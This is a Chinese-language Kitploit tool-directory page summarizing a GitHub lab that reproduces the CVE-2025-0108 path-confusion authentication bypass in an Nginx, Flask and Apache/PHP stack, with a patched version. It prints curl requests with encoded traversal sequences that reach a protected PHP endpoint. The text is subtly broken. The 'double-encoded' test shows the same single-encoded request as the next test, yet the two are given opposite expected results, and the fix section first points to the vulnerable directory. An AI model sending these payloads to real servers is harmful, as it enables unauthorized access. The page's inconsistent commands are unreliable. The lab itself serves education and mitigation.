Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-0108 — 复现了 Nginx/Apache 栈中的 CVE-2025-0108 路径混淆漏洞。包含一个存在漏洞的 PoC 和一个修复后的实现,展示了后端侧针对双重编码认证绕过的缓解措施。 | Kitploit
工具/GitHubGitHub/kso4more/cve-2025-0108
漏洞分析Web应用程序漏洞利用身份验证错误配置学习与教育实验室与实践
GitHubkso4more/cve-2025-0108

CVE-2025-0108

复现了 Nginx/Apache 栈中的 CVE-2025-0108 路径混淆漏洞。包含一个存在漏洞的 PoC 和一个修复后的实现,展示了后端侧针对双重编码认证绕过的缓解措施。

查看仓库
255个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-0108 — Web安全(PoC与修复)

该仓库包含一个小型实验环境,用于复现和缓解CVE-2025-0108问题(Nginx与Apache之间的路径混淆/头走私)。
任务目的是演示在多层级栈(Nginx -> Flask后端 -> Apache/PHP)中,双重编码的请求如何绕过认证,并展示一种后端侧的缓解方案。

此环境仅供教育用途。

目录

  • CVE-2025-0108/ — 易受攻击的实现(PoC)
  • CVE-2025-0108_fix/ — 修补后的实现(后端验证解码后的路径)

漏洞复现(易受攻击) — CVE-2025-0108

目的

模拟因各层级之间对路径解码不一致,导致双重编码路径可绕过认证的易受攻击配置。

启动环境

从 CVE-2025-0108 目录执行:

root@kitploit:~
cd CVE-2025-0108
docker compose up --build

测试

在宿主机上运行以下 curl 命令:

测试1 — 双重编码(预期:HTTP 200)

root@kitploit:~
curl -i "http://127.0.0.1:8085/unauth/%2e%2e/php/ztp_gate.php/PAN_help/x.css"

此请求使用了双重编码(%252e%252e == %2e%2e == ..),演示了易受攻击配置下的绕过行为。应返回 200 OK。

测试2 — 单次编码(预期:HTTP 401)

root@kitploit:~
curl -i "http://127.0.0.1:8085/unauth/%2e%2e/php/ztp_gate.php/PAN_help/x.css"

测试3 — 原始路径包含 ..(预期:HTTP 401)

root@kitploit:~
curl -i "http://127.0.0.1:8085/unauth/../php/ztp_gate.php/PAN_help/x.css"

停止环境:

root@kitploit:~
docker compose down

修复版本 — CVE-2025-0108_fix

后端在允许访问前对解码后的路径执行额外检查。这可以防止请求被双重编码时的认证绕过。

从 CVE-2025-0108 目录执行:

root@kitploit:~
cd CVE-2025-0108
docker compose up --build

测试

在宿主机上运行以下 curl 命令:

从 CVE-2025-0108_fix 目录执行:

root@kitploit:~
cd CVE-2025-0108_fix
docker compose up --build

测试1 — 双重编码(预期:HTTP 401)

root@kitploit:~
curl -i "http://127.0.0.1:8085/unauth/%2e%2e/php/ztp_gate.php/PAN_help/x.css"

修复后的后端检测到解码后的 .. 并返回 401 未授权。

测试2 — 单次编码(预期:HTTP 401)

root@kitploit:~
curl -i "http://127.0.0.1:8085/unauth/%2e%2e/php/ztp_gate.php/PAN_help/x.css"

测试3 — 原始路径包含 ..(预期:HTTP 401)

root@kitploit:~
curl -i "http://127.0.0.1:8085/unauth/../php/ztp_gate.php/PAN_help/x.css"

停止环境:

root@kitploit:~
docker compose down
下载工具